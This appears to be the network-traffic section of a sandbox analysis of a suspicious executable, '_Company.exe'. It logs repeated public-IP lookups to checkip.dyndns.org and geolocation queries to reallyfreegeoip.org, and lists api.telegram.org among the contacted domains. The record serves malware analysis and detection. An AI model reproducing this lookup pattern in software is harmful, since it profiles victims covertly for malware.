                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.649716158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:16.288747072 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:17.508570910 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:17 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 01839c44c3aafd2d084b85dbfc1bd922
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                Dec 18, 2024 17:07:17.513204098 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 18, 2024 17:07:17.904112101 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:17 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: d389a24438a147dbe7d8e54b1e3ad2c6
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                Dec 18, 2024 17:07:19.787808895 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 18, 2024 17:07:20.189551115 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:20 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: bbd849a29bf5667037fafd5d9c68f7b5
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.649736158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:22.108946085 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 18, 2024 17:07:23.323529959 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:23 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 48a0f61c5bf1e27b84c837096097d690
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.649747158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:25.142911911 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 18, 2024 17:07:26.355339050 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 6ec967dc623cf1e19cb904b9ba320d40
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.649756158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:28.198705912 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:29.409709930 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:29 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 6c2788fcfb8ed6f39998c919bc7ebe40
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.649768158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:31.224899054 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:32.433923006 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:32 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: d97c7429d90cae8fb28a1fe94045f71f
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.649779158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:34.230876923 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:35.558201075 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:35 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b75f25098ffb41c4abfa95953356fe4e
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.649787158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:37.356551886 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:38.559560061 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:38 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 03e34034128b6b0b0e4fc896a39597f0
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.649796158.101.44.242807100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 18, 2024 17:07:40.352834940 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 18, 2024 17:07:41.563091040 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: c58cbc53358d84508b611abaf7a6ea7a
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.649724104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:19 UTC870INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:19 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526808
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hg06MYLpGb1Q7DgAIjSWk5IHuOMjKLN07BkwEpayYOEmlqjixPLvAX1NzxFMamJNPzE11r8xPbRAZ4Ylm1EMCiUKJihPVia13KOWNgVrTpteF7YyI8rkannbxr9NE9ZSdyVVc2jY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4067bb8c1d8c05-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1956&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1427174&cwnd=215&unsent_bytes=0&cid=46e7a2da70c549d8&ts=459&x=0"
                                                                                                                                2024-12-18 16:07:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.649728104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                2024-12-18 16:07:21 UTC880INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:21 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526810
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZjGL3jJdznkWE4sym1ty3fB6NtiPmFYT%2Ftvrp4uU60xTlyQErAW%2FzMsdBVGtJgUigQeyDN3GMC1H%2FRSGBDk%2FZce%2FriFPqEz09kGdPpVAJbMbFR3yNpOb1199snGZmDDiXQa3hxs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4067c94a2a4310-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1579&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=242&unsent_bytes=0&cid=746b3f4208f999c6&ts=473&x=0"
                                                                                                                                2024-12-18 16:07:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.649739104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:25 UTC876INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:24 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526813
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oozcmGOuMCQISFVs6yYMyBzNLt7aYu4J0r4qLj0q338UhiWyBUNv8rZK%2BK082PvoYSUN6dGq%2FbuP8Gu%2BPpUn3QFfq1M98V0EgZutV0qNUXJUDvOSFSr9Ri9XYo4V935L7SnPmpV4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4067dc4a6b7d26-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1984&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=205&unsent_bytes=0&cid=7fca804c1775c495&ts=477&x=0"
                                                                                                                                2024-12-18 16:07:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.649753104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:28 UTC880INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:27 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526816
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqlGVU2YjyLhIRyFv1I%2BIZSXsaAdepNLfJkliCap%2B%2FVGZxeHi36fIdViLNvUcswXFB5VWDt6phQ1L%2BwAlGSbOGUHTM8qezSyHuABHjoc8SKJrQnt6GNTSm97m06lzzAgRs6c33X%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f4067ef3b80199d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1847&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1526398&cwnd=223&unsent_bytes=0&cid=aab674d45e982050&ts=473&x=0"
                                                                                                                                2024-12-18 16:07:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.649764104.21.67.1524437100C:\Users\user\Desktop\_Company.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-18 16:07:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-18 16:07:31 UTC877INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 18 Dec 2024 16:07:30 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 526819
                                                                                                                                Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                Accept-Ranges: bytes
